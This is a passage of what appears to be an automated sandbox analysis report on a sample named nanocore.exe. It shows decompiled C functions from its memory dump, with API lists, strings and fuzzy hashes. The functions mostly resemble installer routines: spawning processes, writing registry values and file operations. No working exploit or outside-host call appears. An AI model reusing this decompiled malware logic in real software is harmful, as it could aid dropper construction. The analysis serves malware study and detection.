				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













            0x00401c19
            0x00401c22
            0x00401c2e
            0x00401c31
            0x00401c3b
            0x00401c3b
            0x00401c3e
            0x00401c42
            0x00401c4c
            0x00401c4c
            0x00401c4f
            0x00401c53
            0x00401c55
            0x00401ca2
            0x00401ca4
            0x00401cad
            0x00401cb5
            0x00401cb8
            0x00401cb8
            0x00401cc1
            0x00000000
            0x00401c57
            0x00401c5e
            0x00401c60
            0x00401c68
            0x00401c6b
            0x00401c93
            0x00401cc7
            0x00401cc7
            0x00401c6d
            0x00401c7b
            0x00401c83
            0x00401c86
            0x00401c86
            0x00401c6b
            0x00401cca
            0x00401ccd
            0x00401cd3
            0x004028d7
            0x004028d7
            0x00402932
            0x0040293e

            APIs
            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
            • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
            • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
            • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







            0x00401ea2
            0x00401ea7
            0x00401eb2
            0x00401eb9
            0x00401ebc
            0x004026da
            0x00401ec2
            0x00401ec5
            0x00401ed6
            0x00401ed1
            0x00401ed1
            0x00401eeb
            0x00401ef4
            0x00401f04
            0x00401f06
            0x00401f06
            0x00401ef6
            0x00401efa
            0x00401efa
            0x00401ef4
            0x00401f0d
            0x00401f10
            0x00401f10
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
              • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
              • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
              • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
            • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
            • GetExitCodeProcess.KERNEL32 ref: 00401EEB
            • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 4003922372-47812868
            • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
            • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






            0x00405250
            0x0040525a
            0x00405265
            0x0040526b
            0x0040526b
            0x00405283
            0x0040528b
            0x00405290
            0x00000000
            0x00405296
            0x0040529a

            APIs
            • GetFileAttributesA.KERNEL32(?), ref: 0040525A
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
            • CloseHandle.KERNEL32(?), ref: 00405290
            Strings
            • Error launching installer, xrefs: 00405247
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: AttributesCloseCreateFileHandleProcess
            • String ID: Error launching installer
            • API String ID: 2000254098-66219284
            • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
            • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




            0x004054cd
            0x004054e4
            0x004054ec
            0x004054ec
            0x004054f4

            APIs
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
            • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-3081826266
            • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
            • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
            Download Yara Rule
            C-Code - Quality: 85%
            			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}










            0x00402387
            0x0040238c
            0x00402396
            0x004023a0
            0x004023a3
            0x004023b5
            0x004023bc
            0x004023c4
            0x004023d2
            0x004023d6
            0x004023e1
            0x004023e1
            0x004023e5
            0x004023e9
            0x004023ef
            0x004023f4
            0x004023f4
            0x004023f8
            0x00402404
            0x00402404
            0x0040241d
            0x0040241f
            0x0040241f
            0x00402422
            0x004024fb
            0x004024fb
            0x00402932
            0x0040293e

            APIs
            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
            • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
            • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
            • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CloseCreateValuelstrlen
            • String ID:
            • API String ID: 1356686001-0
            • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
            • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 85%
            			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






            0x00401f50
            0x00401f53
            0x00401f5b
            0x00401f60
            0x00401f65
            0x00401f69
            0x00401f6c
            0x00401f6e
            0x00401f75
            0x00401f7e
            0x00401f86
            0x00401f89
            0x00401f9e
            0x00401fa4
            0x00401fb7
            0x00401fc0
            0x00401fcc
            0x00401fd1
            0x00401fd1
            0x00401fb7
            0x00401fd4
            0x00401be1
            0x00401be1
            0x00401f89
            0x00402932
            0x0040293e

            APIs
            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
            • String ID:
            • API String ID: 1404258612-0
            • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
            • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
            Download Yara Rule
            C-Code - Quality: 92%
            			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








            0x004021fc
            0x00402200
            0x00402208
            0x0040220e
            0x00402211
            0x0040221e
            0x0040222f
            0x00402233
            0x0040223a
            0x00402243
            0x0040224b
            0x0040224e
            0x00402251
            0x00402255
            0x00402266
            0x0040226f
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • lstrlenA.KERNEL32 ref: 00402218
            • lstrlenA.KERNEL32(00000000), ref: 00402222
            • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
            • String ID:
            • API String ID: 3674637002-0
            • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
            • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








            0x00405568
            0x0040556f
            0x00405572
            0x00405577
            0x0040558a
            0x004055a4
            0x00000000
            0x004055a4
            0x0040558e
            0x0040558f
            0x00405592
            0x00405593
            0x0040559b
            0x00000000
            0x00000000
            0x0040559d
            0x004055a0
            0x00000000
            0x00000000
            0x00000000
            0x004055a0
            0x00000000
            0x00405580
            0x00000000
            0x00405581

            APIs
            • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040556D
            • CharNextA.USER32(00000000), ref: 00405572
            • CharNextA.USER32(00000000), ref: 00405581
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharNext
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 3213498283-3081826266
            • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
            • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
            Download Yara Rule
            C-Code - Quality: 61%
            			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
